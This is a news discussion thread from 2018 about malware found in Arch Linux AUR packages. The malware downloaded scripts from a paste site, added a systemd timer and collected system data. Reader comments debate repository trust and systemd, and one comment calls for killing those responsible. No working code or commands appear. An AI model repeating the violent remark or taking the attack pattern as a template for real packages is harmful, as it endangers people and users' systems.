Submitted via IRC for Fnord666
[...] Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages.
[...] The incident happened because AUR allows anyone to take over "orphaned" repositories that have been abandoned by their original authors.
[...] According to a Git commit to the package's source code, xeactor added malicious code that would download a file named "~x" from ptpb.pw, a lightweight site mimicking Pastebin that allows users to share small pieces of texts.
[...] Besides downloading ~u, the main purpose of the first file (~x) was also to modify systemd and add a timer to run the ~u file at every 360 seconds.
[...] No other malicious actions were observed, meaning the acroread package wasn't harming users' systems, but merely collecting data in preparation for... something else.
Source: Malware Found in Arch Linux AUR Package Repository
(Score: 1, Insightful) by Anonymous Coward on Thursday July 12 2018, @09:58AM (7 children)
AUR is a user maintained repository, clearly stated in bold text on the front page.
Always review pkgbuild and patch files.
(Score: 5, Insightful) by Anonymous Coward on Thursday July 12 2018, @10:27AM (3 children)
This is a big deal. Common repositories like this one - even with a disclaimer (what software doesn't deny liability and accountability?) - should be trustworthy. The fact that this instance hasn't done any harm yet is just a matter of timing and good fortune.
Maybe this was just a trail balloon, or it was laying the foundation for something bigger.
if every user is expected to be knowledgeable enough to identify issues reviewing packages before they're installed the current Linux install base will shrink a lot.
(Score: 0) by Anonymous Coward on Thursday July 12 2018, @11:02AM
Most users will use the official, binary package repository.
It's more akin to the BSD ports system. Nothing difficult about reviewing a typical pkgbuild [archlinux.org]
(Score: 4, Insightful) by pD-brane on Thursday July 12 2018, @11:21AM
But it is not an official repository. There is no reason to trust the AUR. Moreover, even proprietary software is allowed in the AUR, so I don't understand why anyone would trust this repository.
Not everyone cares about the number of users. Therefore, I will here try to present a group of users different from those adhering to "The bigger installed base the better!". I would like to use a secure operating system with trusted repositories. Possibly Arch Linux without AUR is that. If I really need something that's provided by AUR, I review the build scripts and/or make a judgement call based on e.g. who signed the package.
There is no absolute, though. I am using OpenBSD's packages (different from ports), all free software. I don't think there are big risks with this; packages [openbsd.org] are actually of a high quality, but by definition it is not part of the base system.
(Score: 3, Touché) by http on Thursday July 12 2018, @09:12PM
This is Arch, not Ubuntu. They do their best in so many ways keep noobs from installing linux.
I browse at -1 when I have mod points. It's unsettling.
(Score: 1, Informative) by Anonymous Coward on Thursday July 12 2018, @10:31AM (2 children)
http://slackbuilds.org/ [slackbuilds.org]
Our goal is to have the largest collection of SlackBuild scripts available while still ensuring that they are of the highest quality - we test every submission prior to inclusion in the repository.
(Score: 0) by Anonymous Coward on Thursday July 12 2018, @01:18PM (1 child)
systemd free
(Score: 2) by DannyB on Thursday July 12 2018, @02:13PM
. . . of any worthwhile reason to exist.
The lower I set my standards the more accomplishments I have.
(Score: 1, Funny) by Deeo Kain on Thursday July 12 2018, @11:19AM (8 children)
When something smells fishy, there's always systemd involved.
(Score: 2) by jasassin on Thursday July 12 2018, @12:49PM (3 children)
Just curious... what's the difference between a malicious payload modifying inetd or inetd.conf or making a new crontab entry?
It just seems to me systemd doesn't have much to do with this.
jasassin@gmail.com GPG Key ID: 0xE6462C68A9A3DB5A
(Score: 2) by Deeo Kain on Thursday July 12 2018, @03:19PM (2 children)
When was it the last time a system was compromised because a sysv init script or init itself was hacked?
(Score: 2) by unauthorized on Thursday July 12 2018, @05:51PM (1 child)
Type the following in your terminal to find out:
(Score: 2) by Pav on Friday July 13 2018, @02:17AM
bash: /etc/rc: Permission denied
BTW, I do know the real problem is a missing /usr/lib/humour.so
(Score: 3, Informative) by unauthorized on Thursday July 12 2018, @12:50PM (2 children)
You can do the same thing with an init script. Every init system is vulnerable to attacks from a local root account.
(Score: 2) by Deeo Kain on Thursday July 12 2018, @03:23PM (1 child)
No, you cannot. Init is so simple, it's rock solid.
systemd on the other hand is such a convoluted, exceedingly complicated and overengineered piece of
crapsoftware it's ripe with security and manageability issues.(Score: 2) by HiThere on Thursday July 12 2018, @05:59PM
The complexity of systemd is a good reason to be skeptical of it. There are others. But your argument that initd is invulnerable to local root based attacks is just foolish. Local root can do *anything* to the system (that isn't overridden by boot time firmware).
Javascript is what you use to allow unknown third parties to run software you have no idea about on your computer.
(Score: 3, Insightful) by darkfeline on Thursday July 12 2018, @08:54PM
Please stop this, you're making people who have reasonable complaints about systemd look bad.
Blindly running malicious code on your computer has got nothing to do with systemd, just like blindly running malicious code on your computer has got nothing to do with initscripts if the malicious code plants itself in /etc/init.d/, or with OpenRC and /etc/rc.d.
Join the SDF Public Access UNIX System today!
(Score: 2) by DannyB on Thursday July 12 2018, @02:20PM (7 children)
It's a good thing that nothing bad [networkworld.com] could happen to Gentoo, which is what Google's Chrome OS is based on.
The lower I set my standards the more accomplishments I have.
(Score: 5, Funny) by takyon on Thursday July 12 2018, @04:33PM (6 children)
Switch to Microsoft Windows Linux [wikipedia.org], bro. It's got this new and improved "closed source" security model. Check it out!
[SIG] 10/28/2017: Soylent Upgrade v14 [soylentnews.org]
(Score: 3, Insightful) by DannyB on Thursday July 12 2018, @05:27PM (1 child)
The bad thing about WSL is that it is Microsoft Linux. So you use WSL and develop your Linux application. You go to deploy it in production on genuine Linux and it doesn't work due to some subtle incompatibility. "Oh, well" management says "we'll just deploy it on Windows in production."
The lower I set my standards the more accomplishments I have.
(Score: 0) by Anonymous Coward on Friday July 13 2018, @01:42AM
That happened to you? Or whom?
(Score: 2, Interesting) by realDonaldTrump on Thursday July 12 2018, @10:53PM (3 children)
Great company, one of the biggest. And maybe they can help us close up that internet too. We're losing so many people to internet!
(Score: 2) by Runaway1956 on Friday July 13 2018, @02:54PM (2 children)
Babbling again? WTF did you just say? No - forget that. WTF did you mean?
(Score: 2) by realDonaldTrump on Friday July 13 2018, @03:44PM (1 child)
Microsoft, one of our great cyber companies, one of the biggest. They have made tremendous progress and the future of the Microsoft is very bright. Especially since they got .@BillGates [twitter.com] out as Chairman. Now they're doing "'closed source' security." And we want that for our internet, to help close up our internet. We have ISIS on our internet, we have sex traffickers on our internet. And we're losing many people. China closed up their internet (Golden Shield) and it's been PERFECTO for them. And we're moving very strongly on that one. Very strongly!
(Score: 2) by Runaway1956 on Friday July 13 2018, @04:18PM
Uhhh, ohkay - you're some kind of gullible fool.
Did you know that Microsoft operating systems are unique? All OTHER operating systems were built on top of security. That is, everything is owned by someone, whether it be root, or a user, or SYSTEM - everything is owned, and no one can take it, or use it. Microsoft? Everything that passes for "security" is just bolted on, as an after thought.
Microsoft security is an oxymoron, just like military intelligence.
(Score: -1, Flamebait) by Anonymous Coward on Thursday July 12 2018, @04:58PM (1 child)
Find the pricks responsible for this.
And kill them.
Please.
Humanity will thank you.
(Score: 0) by Anonymous Coward on Friday July 13 2018, @06:18PM
i tend to agree, but this might have been meant as a friendly warning to aur users.
(Score: 2) by requerdanos on Thursday July 12 2018, @08:44PM
FYI, "acroread" is the Adobe brand Acrobat reader for PDF files (the one that features the exploit of the day/week/month sort of like the Radio Shack free battery of the month club). Saying it's not harmful is either very naive or simply misleading.